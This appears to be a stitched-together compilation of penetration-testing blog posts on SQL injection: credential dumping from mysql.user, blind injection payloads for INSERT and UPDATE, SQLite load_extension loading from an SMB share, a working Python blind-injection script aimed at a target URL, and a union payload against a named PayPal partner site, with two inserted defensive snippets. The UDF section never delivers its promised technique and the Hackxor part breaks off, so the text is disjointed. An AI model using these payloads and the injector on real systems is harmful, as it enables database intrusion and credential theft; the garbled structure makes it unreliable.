MySQL UDF Exploitation

Overview

In the real world, while I was pentesting a financial institute, I came across a scenario where they had an internal intranet that was using MySQL 5.7 64-bit as the backend database technology. Most of the time I encounter MSSQL in most corporate environments, but this was a rare case. I found SQL injection in the web application and I was able to dump the username and password from mysql.user, and I realized it had privileges to write files to disk. This led me to write a post sharing techniques for injecting a UDF library into MySQL, gaining code execution and popping a shell in Windows. When I Googled, most techniques were a bit vague when it comes to Windows. So, I thought of writing this post with my own research to clear things up and help you understand a few tricks you can use to do this manually.

I will be hosting MySQL 5.7.21, the latest community server at the time I am blogging this, on one machine. To reproduce the scenario, I am running the mysqld server with the '--secure-file-priv=' parameter set to blank. In this scenario I was able to retrieve the username and password from the mysql.user table using a union-based injection in the intranet. Note that in MySQL 5.7 and above the column 'password' doesn't exist. They have changed it to 'authentication_string'.

# MySQL 5.6 and below
select host, user, password from mysql.user;
# MySQL 5.7 and above
select host, user, authentication_string from mysql.user;

Note that you can use Metasploit's mysql_hashdump.rb auxiliary module to dump the MySQL hashes if you already have the credentials. At the time I am writing this blog post, the script needed to be updated to extract them in MySQL 5.7; you can check my pull request here.

The host column for the user 'osanda' allows connections from 192.168.0.*, which means we can use this user for remote connections from that IP range. I cracked the password hash and got the plain text password.

MySQL Blind Injection in Insert and Update Statements

I’m not going to explain or write about blind injection in general. There are enough resources on the internet where you can learn. You can check my previous post where I have explained in detail about other types of injections in these statements. Since some of you asked me how to perform blind injection I thought of writing this post.

Boolean Based Blind Injection

We can use ‘+’ or bitwise OR in this scenario. If the result is true the entry will be updated with a ‘1’ and if the result is false the entry will be updated with a ‘0’.
I’m using binary search to make the search faster. Mid = (max+min)/2.
However I’m not sure if this is realistic.

update users set username = '0' | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;
insert into users values (15,'osanda','0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));

Time Based Blind Injection

This approach would be realistic. In this case we can use functions such as sleep() and benchmark(). As before, by using '+' or bitwise OR we can know whether the result is true or false when the row is updated or inserted.

update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;
insert into users values (16,'osanda','0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));

Conclusion

The same can be applied to DELETE statements as well, but the injection is not realistic. There are many methods you can follow using the above syntax. You can develop your own tool to automate this process and improve the efficiency of the search.
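For the defending side, the statements above leave a recognisable shape in a query log: a quoted literal joined by '|' or '+' to a parenthesised expression, and delay functions inside a data-modifying statement. The following is an added example, not part of the original post; the function names and the sample log are constructed for illustration, and the patterns are heuristics rather than a complete detector.

```python
import re

# Only data-modifying statements are of interest here.
WRITE_STMT = re.compile(r"^\s*(insert|update|delete)\b", re.I)
# A quoted literal joined by '|' or '+' to a parenthesised expression or if(...).
LITERAL_OP_EXPR = re.compile(r"'[^']*'\s*[|+]\s*(?:if\s*)?\(", re.I)
# Delay primitives have no business among the values of a write statement.
TIME_FUNC = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)

def classify(statement):
    """Return the set of findings for one logged SQL statement."""
    findings = set()
    if not WRITE_STMT.match(statement):
        return findings
    if LITERAL_OP_EXPR.search(statement):
        findings.add("literal-combined-with-expression")
    if TIME_FUNC.search(statement):
        findings.add("time-delay-function")
    return findings

def scan(log_lines):
    """Return (line_number, findings) for every flagged statement."""
    hits = []
    for number, statement in enumerate(log_lines, 1):
        findings = classify(statement)
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample log: the four statements from this post plus benign traffic.
SAMPLE_LOG = [
    "update users set username = '0' | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14",
    "insert into users values (15,'osanda','0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d))",
    "update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15",
    "insert into users values (16,'osanda','0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1))",
    "update users set username = 'alice' where id=3",
    "insert into users values (17,'bob','O''Brien + (co)')",
    "select sleep(1)",
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, sorted(findings))
```

A hit is a reason to look at the code path that built the statement; the durable fix is binding the value as a parameter so it can never be evaluated as an expression.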

Fun with SQLite Load_Extension

What is load_extension?

This interface loads an SQLite extension library from the named file.

int sqlite3_load_extension(
  sqlite3 *db,          /* Load the extension into this database connection */
  const char *zFile,    /* Name of the shared library containing extension */
  const char *zProc,    /* Entry point. Derived from zFile if 0 */
  char **pzErrMsg       /* Put error message here if not 0 */
);

More information: https://www.sqlite.org/c3ref/load_extension.html
You can use this function to load an SQLite extension. However, extension loading is turned off by default and has to be switched on with sqlite3_enable_load_extension(), to prevent this in SQL injection attacks. You can read more here: https://www.sqlite.org/c3ref/enable_load_extension.html
The syntax would be

select load_extension('path\dll', 'EP');

However, this path (const char *zFile) can be an SMB share too.
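How the default protects an application, and how to keep the SQL function blocked even where extension loading has been switched on, shown with Python's built-in sqlite3 module. This is an added example, not part of the original post; the helper names and the library path are constructed, and enable_load_extension() is only present in Python builds compiled with extension support.

```python
import sqlite3

def sql_load_error(conn, path="/nonexistent/ext.so"):  # constructed path
    """Run select load_extension(path); return the error text, or None if it loaded."""
    try:
        conn.execute("select load_extension(?)", (path,))
        return None
    except sqlite3.DatabaseError as exc:
        return str(exc)

def deny_load_extension(action, arg1, arg2, db_name, source):
    """Authorizer callback: refuse the load_extension() SQL function, allow the rest."""
    if action == sqlite3.SQLITE_FUNCTION and (arg2 or "").lower() == "load_extension":
        return sqlite3.SQLITE_DENY
    return sqlite3.SQLITE_OK

def hardened_connection(database=":memory:"):
    """Open a connection on which SQL text can never reach load_extension()."""
    conn = sqlite3.connect(database)
    conn.set_authorizer(deny_load_extension)
    return conn

def demo():
    """Return the error text seen on a default and on a hardened connection."""
    default = sqlite3.connect(":memory:")
    hardened = hardened_connection()
    # Simulate an application that turned extension loading on (not in every build).
    if hasattr(hardened, "enable_load_extension"):
        hardened.enable_load_extension(True)
    return {"default": sql_load_error(default), "hardened": sql_load_error(hardened)}

if __name__ == "__main__":
    for name, err in demo().items():
        print(name, "->", err)
```

On the hardened connection the statement is rejected when it is prepared, so the file name, local or remote, is never opened.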

Automated Blind SQL Injector

There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.

This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py

import urllib2
import re

# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/

url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
    for j in range(32, 127):
        if(chr(j).isupper()):
            continue
        sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
        target = url + sql
        req = urllib2.Request(target)
        # If cookies exists
        # req.add_header('Cookie','value=1;value=2')
        page = urllib2.urlopen(req)
        html = page.read()

        try:
            re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
            print ('Found: ' + chr(j))
            result += chr(j)
        except:
            pass

print (result)


Hackxor SQL Injection

You can download the complete challenge VM from here. They have provided an online version of the first two levels. I was interested in having a look at it. http://cloaknet.csc.kth.se:8080/proxy.jsp

There is a login page and our goal is to extract all the usernames and passwords from the database.

If you try injecting the login form, none of the injections would work. But there was this text called “No account?”; when you click it you get this message.

After logging in with demo:demo we are taken to “proxypanel.jsp”, which displays source, target and date.



Paypal Partner SQL Injection

One of the PayPal Partner websites, http://ppinvoice.com/, was suffering from a POST SQL injection. Union injection was impossible here.

LoginForm[email]=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3

As we cannot continue with the above error, double query injection works perfectly.